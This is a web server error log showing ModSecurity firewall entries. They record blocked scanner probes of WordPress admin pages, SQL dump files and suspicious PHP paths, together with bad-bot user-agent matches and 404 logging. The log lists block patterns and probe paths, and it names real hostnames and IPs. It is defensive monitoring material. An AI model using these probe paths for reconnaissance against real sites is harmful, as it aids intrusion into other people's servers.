[Tue May 26 13:06:19.893566 2026] [security2:error] [pid 485064:tid 485178] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/import.php"] [unique_id "ahVNcz9tlF55stOmSqER2AAAo3E"]
[Tue May 26 13:06:20.074131 2026] [security2:error] [pid 485064:tid 485065] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/tools.php"] [unique_id "ahVNdD9tlF55stOmSqER3AAAuQA"]
[Tue May 26 13:06:20.254758 2026] [security2:error] [pid 485064:tid 485155] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-admin/options-general.php"] [unique_id "ahVNdD9tlF55stOmSqER3QAA5Fo"]
[Tue May 26 13:06:21.192941 2026] [security2:error] [pid 485064:tid 485252] [client 78.46.215.1:27806] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVNdT9tlF55stOmSqESDAAAAL8"], referer: https://thegoodsporting.com
[Tue May 26 13:06:21.558071 2026] [security2:error] [pid 485064:tid 485187] [remote 172.232.108.36:32888] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "208.91.198.85"] [uri "/"] [unique_id "ahVNdT9tlF55stOmSqESGQAAtXo"]
[Tue May 26 13:06:21.576870 2026] [security2:error] [pid 485064:tid 485230] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNdT9tlF55stOmSqESCAAAAKk"]
[Tue May 26 13:06:23.403209 2026] [security2:error] [pid 485064:tid 485084] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/wp-content/uploads/dump.sql"] [unique_id "ahVNdz9tlF55stOmSqESXgAAoBM"]
[Tue May 26 13:06:23.585915 2026] [security2:error] [pid 485064:tid 485090] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/wp-content/uploads/db.sql"] [unique_id "ahVNdz9tlF55stOmSqESZwAA2hk"]
[Tue May 26 13:06:23.878916 2026] [core:crit] [pid 485064:tid 485312] (13)Permission denied: [client 40.77.167.2:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:06:24.071407 2026] [security2:error] [pid 485064:tid 485281] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNdz9tlF55stOmSqESagAAANw"]
[Tue May 26 13:06:24.102113 2026] [core:crit] [pid 485064:tid 485216] (13)Permission denied: [client 40.77.167.2:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:06:24.162041 2026] [security2:error] [pid 485064:tid 485117] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-cron.php"] [unique_id "ahVNeD9tlF55stOmSqEShAAAtzQ"]
[Tue May 26 13:06:25.453415 2026] [security2:error] [pid 485064:tid 485258] [client 74.7.230.21:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "afstpaul.org.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVNeT9tlF55stOmSqESrwAAAMU"]
[Tue May 26 13:06:25.453923 2026] [security2:error] [pid 485064:tid 485273] [client 74.7.230.21:58858] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "afstpaul.org.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVNeT9tlF55stOmSqESrAAA1CU"]
[Tue May 26 13:06:26.189243 2026] [security2:error] [pid 485064:tid 485229] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNeT9tlF55stOmSqESvAAAAKg"]
[Tue May 26 13:06:26.366944 2026] [security2:error] [pid 485064:tid 485248] [client 74.249.173.207:4351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/admin.php"] [unique_id "ahVNej9tlF55stOmSqESzQAAALs"]
[Tue May 26 13:06:27.463799 2026] [security2:error] [pid 485064:tid 485085] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/xmlrpc.php"] [unique_id "ahVNez9tlF55stOmSqES6QAAixQ"]
[Tue May 26 13:06:27.626090 2026] [security2:error] [pid 485064:tid 485288] [client 74.249.173.207:4741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVNez9tlF55stOmSqES9AAAAOM"]
[Tue May 26 13:06:27.937191 2026] [security2:error] [pid 485064:tid 485318] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNez9tlF55stOmSqES8QAAAQE"]
[Tue May 26 13:06:29.517413 2026] [security2:error] [pid 485064:tid 485094] [remote 172.232.108.36:50438] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "208.91.199.245"] [uri "/"] [unique_id "ahVNfT9tlF55stOmSqETNwAA8R0"]
[Tue May 26 13:06:30.057772 2026] [security2:error] [pid 485064:tid 485257] [client 161.38.224.151:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNfT9tlF55stOmSqETPgAAAMQ"]
[Tue May 26 13:06:30.465423 2026] [security2:error] [pid 485064:tid 485214] [client 216.244.66.241:44806] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVNfj9tlF55stOmSqETYQAAAJk"]
[Tue May 26 13:06:30.465574 2026] [security2:error] [pid 485064:tid 485214] [client 216.244.66.241:44806] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVNfj9tlF55stOmSqETYQAAAJk"]
[Tue May 26 13:06:30.465634 2026] [security2:error] [pid 485064:tid 485258] [client 216.244.66.241:44814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVNfj9tlF55stOmSqETYgAAAMU"]
[Tue May 26 13:06:30.465754 2026] [security2:error] [pid 485064:tid 485258] [client 216.244.66.241:44814] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVNfj9tlF55stOmSqETYgAAAMU"]
[Tue May 26 13:06:31.067458 2026] [security2:error] [pid 485064:tid 485215] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNfj9tlF55stOmSqETaAAAAJo"]
[Tue May 26 13:06:31.740550 2026] [security2:error] [pid 485064:tid 485308] [client 172.98.32.29:45995] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVNfj9tlF55stOmSqETXQAAAPc"]
[Tue May 26 13:06:33.581030 2026] [security2:error] [pid 485064:tid 485205] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNgT9tlF55stOmSqETvwAAAJA"]
[Tue May 26 13:06:35.229633 2026] [security2:error] [pid 485064:tid 485245] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNgj9tlF55stOmSqET-QAAALg"]
[Tue May 26 13:06:37.955765 2026] [security2:error] [pid 485064:tid 485266] [client 20.104.227.76:4534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVNhT9tlF55stOmSqEUdQAAAM0"]
[Tue May 26 13:06:38.323195 2026] [security2:error] [pid 485064:tid 485197] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNhT9tlF55stOmSqEUcgAAAIg"]
[Tue May 26 13:06:39.693434 2026] [security2:error] [pid 485064:tid 485274] [client 20.104.227.76:17566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVNhz9tlF55stOmSqEUtgAAANU"]
[Tue May 26 13:06:40.491498 2026] [security2:error] [pid 485064:tid 485219] [client 74.249.173.207:4307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/cache.php"] [unique_id "ahVNiD9tlF55stOmSqEU3AAAAJ4"]
[Tue May 26 13:06:40.642350 2026] [security2:error] [pid 485064:tid 485239] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNiD9tlF55stOmSqEUzQAAALI"]
[Tue May 26 13:06:41.004076 2026] [security2:error] [pid 485064:tid 485297] [client 69.164.217.245:35107] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "162.215.241.212"] [uri "/index.php"] [unique_id "ahVNiD9tlF55stOmSqEU7AAAAOw"]
[Tue May 26 13:06:41.165605 2026] [security2:error] [pid 485064:tid 485109] [remote 172.232.108.36:19414] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "208.91.198.65"] [uri "/"] [unique_id "ahVNiT9tlF55stOmSqEU9gAAoSw"]
[Tue May 26 13:06:41.489950 2026] [security2:error] [pid 485064:tid 485241] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNiT9tlF55stOmSqEU_AAAALQ"], referer: https://www.anujtradingco.com/
[Tue May 26 13:06:42.241197 2026] [security2:error] [pid 485064:tid 485282] [client 57.141.2.49:22891] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yndglobal.com"] [uri "/index.php"] [unique_id "ahVNiD9tlF55stOmSqEUxwAA3Sk"]
[Tue May 26 13:06:42.253381 2026] [security2:error] [pid 485064:tid 485318] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNij9tlF55stOmSqEVHgAAAQE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285277&moderation-hash=4e0d83967d61716d2f3f85439cb6c2c2
[Tue May 26 13:06:42.302969 2026] [security2:error] [pid 485064:tid 485283] [client 114.119.153.38:32249] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahVNij9tlF55stOmSqEVJQAAAN4"], referer: https://www.ameritradeng.com/
[Tue May 26 13:06:42.435923 2026] [security2:error] [pid 485064:tid 485232] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNij9tlF55stOmSqEVFwAAAKs"]
[Tue May 26 13:06:44.440909 2026] [security2:error] [pid 485064:tid 485285] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNjD9tlF55stOmSqEVfwAAAOA"], referer: https://anujtradingco.com
[Tue May 26 13:06:44.643271 2026] [security2:error] [pid 485064:tid 485205] [client 74.249.173.207:4322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/themes.php"] [unique_id "ahVNjD9tlF55stOmSqEVigAAAJA"]
[Tue May 26 13:06:44.745770 2026] [security2:error] [pid 485064:tid 485272] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNjD9tlF55stOmSqEVfAAAANM"]
[Tue May 26 13:06:47.164885 2026] [security2:error] [pid 485064:tid 485223] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNjj9tlF55stOmSqEV9QAAAKI"]
[Tue May 26 13:06:49.397186 2026] [security2:error] [pid 485064:tid 485290] [client 74.249.173.207:4315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/an.php"] [unique_id "ahVNkT9tlF55stOmSqEWVwAAAOU"]
[Tue May 26 13:06:50.263215 2026] [security2:error] [pid 485064:tid 485286] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNkT9tlF55stOmSqEWaQAAAOE"]
[Tue May 26 13:06:52.318296 2026] [security2:error] [pid 485064:tid 485320] [client 74.7.241.180:54834] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.karuppuswamykovil.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVNlD9tlF55stOmSqEWzwABAwM"]
[Tue May 26 13:06:52.398524 2026] [security2:error] [pid 485064:tid 485248] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNkz9tlF55stOmSqEWuwAAALs"]
[Tue May 26 13:06:52.522996 2026] [security2:error] [pid 485064:tid 485187] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/ipn.php"] [unique_id "ahVNlD9tlF55stOmSqEW1gAAqXo"]
[Tue May 26 13:06:53.243753 2026] [security2:error] [pid 485064:tid 485246] [client 20.104.227.76:8273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVNlT9tlF55stOmSqEW_AAAALk"]
[Tue May 26 13:06:54.532253 2026] [security2:error] [pid 485064:tid 485307] [client 172.224.240.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVNlj9tlF55stOmSqEXKgAAAPY"]
[Tue May 26 13:06:56.644798 2026] [security2:error] [pid 485064:tid 485237] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNmD9tlF55stOmSqEXeQAAALA"]
[Tue May 26 13:06:56.790191 2026] [security2:error] [pid 485064:tid 485304] [client 20.104.227.76:4513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "sreeyogapackersmovers.com.svijaykumar.in"] [uri "/function/function.php"] [unique_id "ahVNmD9tlF55stOmSqEXlwAAAPM"]
[Tue May 26 13:06:56.857602 2026] [security2:error] [pid 485064:tid 485291] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNmD9tlF55stOmSqEXhAAAAOY"]
[Tue May 26 13:06:57.212733 2026] [security2:error] [pid 485064:tid 485200] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXpAAAizo"]
[Tue May 26 13:06:57.585545 2026] [security2:error] [pid 485064:tid 485298] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXvwAA7SA"]
[Tue May 26 13:06:57.670432 2026] [security2:error] [pid 485064:tid 485283] [client 42.105.199.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXqgAAAN4"]
[Tue May 26 13:06:57.726200 2026] [security2:error] [pid 485064:tid 485306] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXwwAA9QI"]
[Tue May 26 13:06:57.867198 2026] [security2:error] [pid 485064:tid 485309] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXxQAA-C4"]
[Tue May 26 13:06:58.025664 2026] [security2:error] [pid 485064:tid 485320] [client 149.56.150.79:47135] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "thriveswift.com"] [uri "/index.php"] [unique_id "ahVNmT9tlF55stOmSqEXzgABAyQ"]
[Tue May 26 13:06:59.675274 2026] [security2:error] [pid 485064:tid 485246] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNmz9tlF55stOmSqEYBgAAALk"]
